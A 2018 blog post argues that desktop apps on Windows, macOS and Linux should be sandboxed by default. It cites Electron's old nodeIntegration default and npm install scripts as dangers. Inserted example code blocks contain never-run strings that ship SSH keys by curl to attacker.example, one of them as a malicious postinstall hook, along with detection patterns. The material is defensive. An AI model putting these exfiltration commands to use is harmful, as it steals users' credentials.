When will we get secure desktop OSes?

2018-08-12

PC/Mac-using people. We have a problem. That problem is our machines are not remotely secure. 10 years ago I used to not really worry about it, but I feel like the time has come that if something isn't done soon we're all going to lose our data and have our bank accounts stolen etc...

Maybe this comes from working on Chrome where security is taken seriously. That's not to say it isn't taken seriously in other places, but rather that working on Chrome, all the ways in which a program can do bad things, and how to stop them, come up constantly. Of course a browser runs "untrusted code", by which I mean that, unless you shut off JavaScript, every page you visit gets to run code on your machine via JavaScript and/or WebAssembly.

That's awesome IMO. It gives us things like Google Maps, which is amazing, and things like Google.com/flights, which gives instant and live results, but it also means browsers have to be vigilant and have to consider how APIs are designed so that a random site's code can't do bad things to your computer.

Sure, some people will read this and rant that browsers shouldn't run code in the first place. I disagree. I think Google Maps is far better with JavaScript than without. But, that's beside the point.

The point is NATIVE APPS HAVE THE SAME PROBLEMS!

The distinction is supposed to be that code in the browser could come from anywhere. The ads on your favorite sites include code to track you. The site itself has code to do whatever (get the latest posts live or send you a message notification). You didn't explicitly say "I trust this code" so it's "untrusted".

That is supposed to be in contrast to apps you install on your computer. The act of choosing to install a native app is implicitly saying "I trust this app".

That is a problem. You shouldn't trust apps. You shouldn't have to trust apps any more than you should have to trust webpages. Apps can be just as evil as a webpage. In fact apps can be more evil because at the moment they aren't sandboxed on Mac or Windows or Linux, so they can do far more damage than a webpage.

An app can read your entire hard drive, or at least all the data in your user folder, which is probably where all your important data is anyway. That means it can look at all your photos, all your movies, read through all your files including whatever financial files you've saved on your computer. If you're a geek and you have private SSH keys stored in ~/.ssh, all those keys can be read by any software you install, because the only thing protecting them is file permissions, and the app runs as you.

A native app can constantly read your clipboard, even when it's not the frontmost app, and send that to some server on the net. A native app can turn on your camera or your mic without asking. It can scan your network for other devices, some of which might have known exploits.

And of course a large percentage of apps, especially on Windows but even on Mac, ask for admin permission to install, which means they can pretty much do anything they want. Install a key logger and record every key you press. Install a screen grabber and download images of your desktop at any time. They can look at which apps you're running and report that back to their respective companies. They can report the file names of which videos you're watching. They can monitor your network to see which sites you're accessing and what files you're downloading.

THIS HAS TO STOP!!!

The reason it's this way is basically historical. Before all machines were connected to the internet it just never crossed anyone's mind that these things might be problems. We had, say, 20-30 years like that where it was just assumed installed apps were trustworthy. So, we have the issue that if Windows and MacOS and Linux were to switch overnight to prevent apps from doing these things, all old software would break. Because of that it's hard to push sandboxing apps as the default.

Both Apple and Microsoft took a step forward on this with their respective app stores. Apps installed from the Mac App Store or the Windows App Store run somewhat sandboxed. Microsoft recently dropped that sandbox requirement though, as they are shipping their Ubuntu integration (the Windows Subsystem for Linux) through the Windows App Store and it has access to everything.

In general, I don't think any app should have permanent permission to access your mic or your camera. Even Facetime should be asking for permission each and every time. It wouldn't be that bad a UX. You'd make a call and the OS would prompt "Facetime would like to use the camera Y/N" and your call would be made.

The problem is once you give an app permission then you never know when it's turning on the mic or the camera. For mobile this might be slightly less of an issue since, at least on iOS, only one app runs at a time, so you know some background app can't be using the mic (AFAIK). For desktop that's not true, so once you've given an app permission to use the camera you really never know when it will do so. Of course on desktop right now there is no camera permission even if sandboxed. You gave it permission just by the act of installing it. You can see MacOS doesn't even have the option to prevent an app from accessing the mic or the camera.

And, this isn't just an issue of trusting each company. You might trust Slack and install their Slack app. Or you might trust Adobe and install Photoshop, but those companies are using 100s of 3rd party libraries. You're really trusting 1000s of people for each piece of software you install. You're trusting that all 1000+ people are not trying to do anything bad. That all 1000+ people, every disgruntled employee, every scheming person in the chain, didn't decide to try to sneak in some backdoor.

And, even if they aren't intentionally doing something bad, there are still bugs. You install some game like Call of Duty. That game sends data between players. Turns out, because of a bug, another player can hack the networking on their computer to send your computer bad data through the game. They can then own your machine, read all your data, use your camera, mic, etc, hack your router, infect other machines on your network.

This kind of bug is potentially true of any app that exchanges data between users. Your chat app (slack, irc), your email app, your online games, your social networking apps (facebook, line, whatsapp), etc... You're trusting there are no bugs. Right now there's an extremely popular app framework called Electron. Lots of famous and not so famous apps use it. And yet it's INSECURE BY DEFAULT: as of this writing a BrowserWindow gets Node.js integration turned on unless the app explicitly turns it off, so any script that ends up running in the page, including one injected through a cross-site scripting bug in content that came from another user or from a server, can call Node.js APIs and do anything a native app can. I'd guess if you're using an app based on Electron and that app communicates with a server then odds are > 50% it's insecure. The app itself might be hard coded to only ever talk to the app company's servers, which means some random hacker can't use it to pwn your machine easily (though maybe they can when you're on their fake wifi). But, unless all the security advice is followed, then any disgruntled employee or evil manager could use the path between the company and your computer to use the insecurities to do whatever they want to your machine.
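To make the "insecure by default" point concrete, here is an added example (not code from the original post and not Electron's own code). It puts the webPreferences a BrowserWindow effectively got in Electron 2.x/3.x, the versions current in 2018, next to the opt-in hardened settings, and adds two hypothetical helpers, auditWebPreferences() and hardenWebPreferences(), so the difference can be checked mechanically. The payload string is constructed for illustration and is never evaluated.

```javascript
// Added example, not from the original post or from the Electron project.
// auditWebPreferences() and hardenWebPreferences() are hypothetical helpers
// written for this example; the option names are Electron's real ones.

// What `new BrowserWindow({})` effectively got in Electron 2.x/3.x (2018)
// if the app author did not opt out.
const legacyDefaults = {
  nodeIntegration: true,   // page scripts get require(), process, Buffer...
  contextIsolation: false, // page scripts and the preload share one JS world
  sandbox: false,          // renderer runs outside the Chromium OS sandbox
  webSecurity: true,       // same-origin policy still enforced
};

// What the Electron security checklist tells app authors to set instead.
const hardenedPrefs = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
};

// With legacyDefaults, one XSS in a chat message, or a tampered page fetched
// over the app's connection, becomes native code execution. This is the kind
// of thing such a script could do; it is a constructed string, never run.
const payloadIfNodeIntegrationIsOn =
  "require('child_process').exec('cat ~/.ssh/id_rsa | curl -T - https://attacker.example/')";

// Reports which settings let page content reach Node.js or the OS.
// loadsRemoteContent: does the window ever show data that did not ship inside
// the app (messages from other users, server-rendered HTML, ads)?
function auditWebPreferences(prefs, loadsRemoteContent) {
  const findings = [];
  if (prefs.nodeIntegration !== false) {
    findings.push('nodeIntegration on: page scripts can call any Node.js API');
  }
  if (prefs.contextIsolation !== true) {
    findings.push('contextIsolation off: page scripts can reach preload globals');
  }
  if (prefs.sandbox !== true) {
    findings.push('sandbox off: a renderer bug gives an unsandboxed process');
  }
  if (prefs.webSecurity === false) {
    findings.push('webSecurity off: same-origin policy disabled');
  }
  if (loadsRemoteContent && prefs.nodeIntegration !== false) {
    findings.push('remote content + nodeIntegration: any XSS is remote code execution');
  }
  return findings;
}

// Returns a copy of prefs with every audited setting forced to its safe value.
function hardenWebPreferences(prefs) {
  return {
    ...prefs,
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
    webSecurity: true,
  };
}

// Stand-alone demo: the 2018 defaults fail four checks, the hardened set none.
console.log('legacy defaults :', auditWebPreferences(legacyDefaults, true));
console.log('hardened        :', auditWebPreferences(hardenedPrefs, true));
console.log('hardened legacy :', auditWebPreferences(hardenWebPreferences(legacyDefaults), true));
console.log('never executed  :', payloadIfNodeIntegrationIsOn);
```

The important line is the last check in auditWebPreferences(): the app being "hard coded to talk only to the company's servers" does not help if the content those servers relay came from another user, because with nodeIntegration on, a script injected into the page is a script running with the app's full privileges.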

Heck, even without frameworks like Electron, apps auto update and each update could add code to do bad things to your machine. The nice people that started the app might have been replaced with less nice people. The company that made the app might have decided they wanted to do more spying on your machine for marketing purposes, so your software that used to be trustworthy no longer is.

Sandboxing apps solves, or at least is a step to solving, all of those issues. With a good sandbox an app can't read the data or files of other apps (without your permission). With a good sandbox an app can't access the mic or camera. With a good sandbox, even if the app has bugs that let other users hack your app, they can only affect that app and its data, not your entire computer and all data. A really good sandbox could even prevent scanning your local network.

Steam recently had an exploit anyone could have used to hack your machine. Sure, they fixed it, but that's not the lesson that should have been learned. The lesson should have been that Steam should never have been in a position where a bug in it exposes your entire machine. It should be running in a sandbox!

People, in particular software developers, rebel at the idea of sandboxing their software. This is especially frustrating because they should be able to see the dangers. Dev software itself has this issue. Many devs install software almost daily. They download software libraries as packages or as git repositories and trust those libraries are not owning their machines or spying on them. Seriously, typing npm install pick-your-favorite-lib is literally trusting 100s if not 1000s of people you've never met not to trash your computer and or steal your data: npm runs each package's install scripts as you, with access to everything your user account can read. Being told to type apt-get install some-package (which runs the package's maintainer scripts as root) and or brew install package should not be opening your data to getting stolen. There needs to be a better way to sandbox even command line apps.
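As an added example (not from the original post and not npm's own code), here is the mechanism that makes npm install an act of trust: npm runs a package's preinstall, install and postinstall scripts automatically, as your user. The package.json below is constructed for this example (the domain attacker.example and the package names are made up, and nothing in it is executed); findInstallScripts(), auditPackages() and looksRisky() are hypothetical helpers that list what would run before you let it.

```javascript
// Added example, not from the original post or from npm. The package.json
// texts are constructed; the helper functions are hypothetical.

// Lifecycle hooks npm runs, as the current user, the moment a package lands.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// A constructed dependency that looks harmless but ships your SSH keys off
// during install. The command is data here and is never executed.
const suspiciousPackageJson = JSON.stringify({
  name: 'pick-your-favorite-lib',
  version: '1.2.3',
  main: 'index.js',
  scripts: {
    test: 'mocha',
    postinstall:
      "node -e \"require('child_process').exec('tar cz ~/.ssh | curl -T - https://attacker.example/')\"",
  },
});

// A constructed dependency with no install-time hooks at all.
const benignPackageJson = JSON.stringify({
  name: 'left-pad-ish',
  version: '0.1.0',
  scripts: { test: 'node test.js' },
});

// Returns the install-time scripts a package.json declares, i.e. the commands
// npm will run on your machine as soon as the package is installed.
function findInstallScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ package: pkg.name, hook, command: scripts[hook] }));
}

// Walks a map of package name -> package.json text (what you would build by
// reading node_modules/*/package.json) and lists every install hook found.
function auditPackages(packageJsonByName) {
  const findings = [];
  for (const text of Object.values(packageJsonByName)) {
    findings.push(...findInstallScripts(text));
  }
  return findings;
}

// Crude triage: does the command reach the network, the home directory, or
// spawn other processes? A native build step like `node-gyp rebuild` does not.
const RISKY_PATTERNS = [
  /curl|wget|fetch\(|https?:\/\//i,
  /~\/|\$HOME|os\.homedir/i,
  /child_process|exec\(|spawn\(/i,
];
function looksRisky(command) {
  return RISKY_PATTERNS.some((re) => re.test(command));
}

// Stand-alone demo over the two constructed packages.
for (const f of auditPackages({ a: suspiciousPackageJson, b: benignPackageJson })) {
  console.log(`${f.package} ${f.hook}${looksRisky(f.command) ? ' [RISKY]' : ''}: ${f.command}`);
}
```

The practical defence today is to stop the scripts from running in the first place: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) installs the files without executing any hooks, and a check like the one above tells you which packages declared hooks so you can read them before running `npm rebuild <package>` for the few, typically native-addon builds, that genuinely need them. That still only reduces the trust to the package's runtime code, which is the whole point of the post: without an OS sandbox, the remaining trust is total.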

One way to solve this is to create a new VM for every project, but at the moment that's too burdensome, so almost no one does it. Microsoft is apparently adding a feature to do this but it doesn't sound like a serious solution. It's only for temporarily running some software. It's not for putting each app in its own sandbox.

Another solution is to run a more sandboxed OS like Qubes OS. Unfortunately the apps people want to run are generally not available on Qubes, so that isn't really a solution. Apple and Microsoft are really the two companies that need to lead the fix for this.

Unfortunately their current solutions so far are broken. First off, their new sandboxes are optional. You can still install software that runs outside the sandbox, and because of that it's still the norm to install un-sandboxed software. Probably 95% of all the software installed on both OSes runs un-sandboxed. All games on Steam and pretty much all brand name apps run unsandboxed.

Secondly, their desktop sandboxes are leaky. See the fact that the camera and mic are not sandboxed yet.

And, finally and most important, they've conflated sandboxing with their store. Getting apps from an official store should be separated from sandboxing apps. Any app, regardless of how it's installed, should be subject to sandboxing restrictions by default. You shouldn't have to only get store apps to be sandboxed. The OS should be designed to be safe by default.

I'm sure you can think of an exception, some software that can't function in a sandbox, and that's mostly fine, but that should be the exception, and Apple and Microsoft and users at large should shame and boycott any software that tries to avoid sandboxing. This includes companies like Adobe that are known for hacking your OS at a deep level to spy on you.

I'm not holding my breath and I'm sure I'll get some rants about sandboxing in the comments. I've even seen arguments that sandboxing isn't a solution. To that argument I'd argue back that if you believe sandboxing is not a solution then you should be fine to run your browser with sandboxing off and you should be fine running all software as root/admin. If you aren't willing to do that then you do actually believe sandboxing has an important role to play in protecting your computer.

At some point I expect the exploits to multiply like crazy. I'll bet the majority of multiplayer games have exploits. I'll bet lots of apps that have semi-constant networking have exploits. I'll bet that more and more desktop apps will be caught spying on you in one way or another. And I'll bet this will get worse and worse over the years until it becomes clear we need sandboxes. I think iOS and Android have already shown how important they are. Desktop PCs are no different.

Let's hope Microsoft and Apple make better sandboxes. Let's also hope they separate them from their stores and from their certification systems. Sandboxes should be the default.
